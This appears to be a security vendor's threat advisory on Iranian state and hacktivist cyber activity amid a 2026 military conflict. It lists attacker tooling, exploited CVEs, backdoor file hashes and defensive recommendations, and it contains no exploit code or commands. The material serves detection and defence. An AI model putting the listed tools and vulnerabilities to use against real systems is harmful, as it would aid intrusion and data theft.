Intel Bulletin: Geopolitical Escalation and Cyber Risk Advisory – March 12, 2026
Status: Active Exploitation Publicly Disclosed
Current Threat Posture: Heightened
Expected Activity Window: Days to Weeks
| Known Indicators of Compromise | |
| Dindoor | JavaScript Backdoor |
| FakeSet | Python Backdoor |
| Rclone | Leveraged for Exfiltration |
| Known Tooling | |
| Reconnaissance | smbmap, whoami, net.exe |
| Remote Access/Lateral Movement | SimpleHelp, Tactical RMM, Syncro, Out1, Plink, N-Able, RDP |
| Execution | WMI, WMIExec, PowerShell, PowerSploit, mshta, msiexec |
| Command and Control (C2) | PhonyC2, MuddyC3, MuddyC2Go |
| File Transfer/Storage: | RClone, UploadBoy, Sync, TeraBox, Backblaze, Oshi, OneHub |
| Recommended Defensive Focus | |
| Identity protection is critical | Iranian actors frequently gain access through phishing, password spraying, and credential theft, making MFA enforcement and authentication monitoring essential. |
| Internet-facing systems are a primary entry point | Organizations should prioritize patching edge devices, VPN appliances, and exposed services to reduce exploitation risk. |
| Social engineering and data theft are common tactics | Iranian campaigns often rely on phishing, SMS/voice impersonation, and credential harvesting, followed by data exfiltration or persistence inside networks. |
| Organizations should ensure resilience against disruption | Validated backups and clear incident response procedures are necessary in the event of destructive or disruptive activity. |
The conflict between Iran, Israel, and the United States continues to quickly escalate from years of proxy warfare and nuclear tensions into an open military campaign. On February 28th, 2026, the United States and Israel launched Operations Epic Fury and Roaring Lion, striking Iran’s missile infrastructure, IRGC leadership, and senior regime officials. Iran responded with retaliatory missile and drone attacks across the broader Middle East and has continued to expand the scope of its response in the days since. The conflict shows no signs of near-term resolution, and Iran’s retaliation will not remain confined to the physical battlefield.
Blackpoint’s Adversary Pursuit Group (APG) is actively monitoring the landscape, including cybercriminal forums, social media, and known threat actor chats, and ingesting indicators of compromise disclosed in publicly available reporting and commercial feeds tied directly to these escalating tensions. Iranian state-sponsored actors, organized under the Islamic Revolutionary Guard Corps (IRGC) and the Ministry of Intelligence and Security (MOIS) have utilized cyber operations as a core instrument of national power. Iran has consistently used cyber operations to project power globally, targeting critical infrastructure, financial systems, and private industry far beyond the immediate conflict zone.
For Managed Service Providers (MSPs), the risk is concrete and immediate. Iranian-aligned hacktivist groups, many of which operate outside of Iran, unaffected by Iranian domestic disruptions, are actively targeting organizations perceived as aligned with the United States or Israel. In addition to hacktivist activity, Iranian state-linked cyber operators and affiliated APT groups (MuddyWater, APT42, APT35, etc.) may conduct or enable retaliatory cyber operations, either directly or by leveraging hacktivist fronts to obscure attribution. MSPs are always an attractive target because a single compromised provider can grant adversaries access to dozens of downstream client environments. Blackpoint’s APG expects an increase in cyberattacks targeting high value targets in key verticals with the goal of maximum public disruption. Verticals at high risk of being targeted include public utilities, telecommunications, finance, transport, government, education, research, and manufacturing. While these critical industries are frequently the target of known and publicly reported Iranian-attributed cyber activity; there is an even chance that other industries will be targeted in an attempt to conduct supply chain attacks, retaliatory actions, or targets of opportunity.
The Blackpoint Response Operations Center (BROC) is on high alert and is taking a proactive and structured approach to addressing this threat. Indicators of compromise (IOCs) associated with known Iranian threat actors and affiliated hacktivist groups are being continuously ingested from government advisories, trusted threat intelligence feeds, and open-source reporting. These indicators are operationalized directly into detection tooling to ensure that any matching activity across Blackpoint’s monitored environments generates an immediate alert for triage and response. In parallel, the BROC is conducting active threat hunts focused on the tactics, techniques, and infrastructure patterns most closely associated with this conflict, paying particular attention to pre-positioned access, anomalous authentication behavior, and lateral movement consistent with Iranian tradecraft.
When the Dust Settles: Projecting Iran’s Next Move
As the kinetic conflict continues and Iran’s command structure reconstitute, Blackpoint’s APG assesses that Iranian cyber activity will transition from opportunistic hacktivist noise into sustained, high-impact campaigns that have historically defined Iran’s approach. The United States and its allies should expect a prolonged threat environment that outlasts the military campaign itself. Iran has demonstrated repeatedly that it does not stand down when missiles stop flying; they retool, reestablish access, and return with greater precision.
Phase One: High Volume, Low Sophistication
The immediate phase of the conflict has produced a temporary but meaningful disruption to Iran’s centralized cyber operations. The collapse of domestic internet connectivity to near zero, combined with the decapitation of senior IRGC and MOIS leadership, has forced Iran’s cyber apparatus into a distributed and autonomous operating mode. Individual units and cells are likely executing offensive operations using pre-established playbooks without the benefit of centralized coordination. This produces a threat that is less precise in the short term but no less dangerous, as autonomous operators are more likely to also operate outside of their typical boundaries.
As connectivity is restored and the Iranian regime stabilizes under new leadership, Blackpoint’s APG projects a phased escalation of Iranian cyber activity. The beginning of this cyber activity, which is already underway, is likely to be high in volume and low in sophistication stemming from the hacktivist ecosystem. These primary tools of this phase include:
- Distributed denial of service (DDoS)
- Website defacements
- Disinformation campaigns
These tools are designed to maintain psychological pressure and create the perception of a capable and coordinated response while the regime rebuilds itself behind the scenes.
Phase Two: Disrupt, Destroy, Expose
The next phase will mark the return of Iran’s more capable state-sponsored actors, who will begin executing against pre-positioned campaigns targeting environments across North America, Europe, and the Gulf. This phase is expected to be significantly more destructive in nature, characterized by the utilization of malware designed to disrupt, destroy, or expose. Coordinated hack-and-leak operations will likely run in parallel, deliberately timed to coincide with critical moments in this kinetic conflict.
Iran’s targeting of industrial control systems (ICS) and operational technology (OT) environments is a well-established and deliberate element of its cyber doctrine. These attacks rarely originate within the OT environment itself. Instead, adversaries gain their initial foothold through traditional intrusion techniques directed at corporate IT networks, including credential theft, phishing, and exploitation of publicly facing systems, before pivoting laterally into the connected operational infrastructure. The compromise of a business network and the sabotage of physical infrastructure are not separate incidents. They are sequential stages of a single calculated operation. For MSPs and their clients, this distinction matters enormously, as an organization does not need to directly manage critical infrastructure to be part of the supply chain an adversary targets to reach it.
The most consequential phase of Iran’s cyber response will be driven not by opportunity, but by necessity. If the conflict continues to erode Iran’s military standing or push the regime toward collapse, cyber operations become one of the few remaining instruments through which Iran can exert meaningful leverage on the world stage. The motivation at that point shifts entirely away from intelligence collection or financial disruption and toward demonstrating that the cost of continued Western military involvement is too high to sustain. When survival is the only objective remaining, restraint is no longer a strategic consideration, and a regime with its back against the wall will exhaust every available capability it has left on the table.
MuddyWater Enters the Fray
Public reports of cyber-attacks likely performed by MuddyWater, an affiliate of the Iranian Ministry of Intelligence and Security (MOIS), have been observed targeting U.S. companies. The organizations targeted by these offensive operations include a bank within the U.S., a non-profit, a software company, and an airport. The targeting of these critical verticals highlights the likely intent to cause public disruption.
According to public reports, these attacks began in early February, a few weeks after the U.S. publicly disclosed the possibility of military strikes in mid-January.
MuddyWater has been active since at least 2017 and largely targets critical infrastructure and private government contractors in the following industries: local government, defense, energy, healthcare, industrials, academics, MSPs, business services, and telecommunications. The group is considered to be espionage motivated, targeting information that could be of use to the Iranian government.
The TTPs associated with MuddyWater have remained consistent over the bulk of their observed operations, commonly using RMM tools, edge device exploits, open-source hacking tools, and living-off-the-land binaries (LOLBins) to accomplish their tasks. In general, the use of RMMs by threat actors have increased significantly over the last few years. The above techniques also align with the most common threats that Blackpoint observed in 2025.
The group has been known to exploit high severity vulnerabilities to achieve their goals as well. Some of these vulnerabilities are:
- CVE-2017-0199 (CVSS 7.8): An RCE vulnerability impacting Microsoft Office/WordPad.
- CVE-2023-27350 (CVSS: 8.8): An access control vulnerability impacting PaperCut MF/NG.
- CVE-2020-1472 (CVSS: 10.0): A privilege escalation vulnerability impacting Netlogon.
Observed Tradecraft
Additional Relevant Groups and Historical Analysis of the Impact of Kinetic Operations on the Threat Landscape
A hacktivist group, Handala Hacking Team, has been reported to target critical vertical organizations in Israel. The group has been active since 2023 and maintains a data leak site and has claimed to target organizations in the Business Services, Construction & Engineering, Technology, Government, and Transportation industry verticals. More recently, they’ve been observed routing traffic through StarLink. The activity sourcing from these ranges has been scanning for externally facing applications for vulnerabilities. Publicly exposed and/or vulnerable SSL VPNs are among the most common initial access vectors resulting in on premises incidents actioned by the SOC.
During times of increased geopolitical tension or kinetic activity taken by a nation, a marked increase in cyberattacks between affiliated parties follows. This has been observed prior during conflicts in the Middle East as well as during the ongoing conflict between Russia and Ukraine.
The goals of these attacks are often disruption or espionage. As such, common targets for threat actors motivated by geopolitics (nation-state actors or hacktivists) are those that would cause the most interruption for the target country. These verticals tend to be critical infrastructure, financial organizations within the country, disrupting telecommunications and transportation, theft of data from educational or research institutions, and interrupting supply chains by targeting manufacturing. Government organizations are also targeted with the goal of espionage.
It should be noted that the purpose of this notice is to keep our client base informed and to suggest proactive security checks. Blackpoint has not observed exploitation consistent with or connected to rising geopolitical tensions within our client base at the time of this writing.
Blackpoint will continue to monitor and provide updates as needed. As always, Blackpoint monitors and takes aggressive action against suspicious and malicious activity within customer environments, including signs of persistence, lateral movement, and threat actor tradecraft. Blackpoint is also closely monitoring this situation to ensure that our security teams have the most relevant and timely intelligence.
Fingerprints of the Attack: Known Indicators of Compromise (IOCs)
Details of attacks are still emerging as they occur and are analyzed. However, two backdoors have been identified in these recent attacks. The first is Dindoor, a previously unknown JavaScript backdoor which utilizes Deno for execution. The second is known as Fakeset, which is written in Python.
These infections were not seen in the same network, but were signed with the same certificates. This hints at the likelihood that the two samples were written and utilized by the same threat actor.
Tools Seen So Far:
- Data Exfiltration: Rclone
- Persistence and Access: Dindoor
- Persistence and Access: Fakeset
This list will likely grow as more information emerges.
Publicly Reported IOCs
Dindoor:
- 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542
- 1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1
- 2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043
- 2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5
- 42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f
- 7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4
- 7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef
- b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0
- bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a
- c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e
Fakeset:
- 077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de
- 15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84
- 2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6
- 4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be
- 64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb
- 64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1
- 74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d
- 94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444
- a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377
- a5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c
- ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888
Defensive Recommendations
Identity & Access Controls
- Enforce multi-factor authentication (MFA) across all infrastructure access points
- Monitor for anomalous authentication behavior and password spraying
- Audit administrative accounts and apply least privilege principles
Exposure Management
- Ensure all software, especially edge devices and VPN appliances, is fully patched
- Review externally exposed services and minimize unnecessary attack surface
- Validate remote access configurations
Detection & Monitoring
- Increase caution regarding phishing, SMS-based social engineering, and voice-based impersonation attempts, as Iran-nexus threat actors have relied heavily on social engineering attacks in recent years.
- Monitor for large amounts of data egress
- Confirm logging coverage across identity systems and remote access services
- Maintain heightened alerting for signs of persistence and lateral movement
- Block aforementioned hashes in applicable security software
Platform-Specific Controls
- Enable and configure Managed Application Control (MAC) within the Blackpoint portal, specifically regarding file transfer and RMM tools, as Iran-nexus threat actors have been known to abuse these in their campaigns.
- Ensure EDR visibility is complete across endpoints and servers
- Device Compliance & Conditional Access
- Enforce device compliance policies for all endpoints accessing corporate resources
- Require managed, encrypted, and monitored devices for access to sensitive systems
- Integrate device health into conditional access policies alongside MFA
Business Continuity
- Validate backup integrity, including offline or immutable copies
- Review internal incident response procedures and escalation paths
References
https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us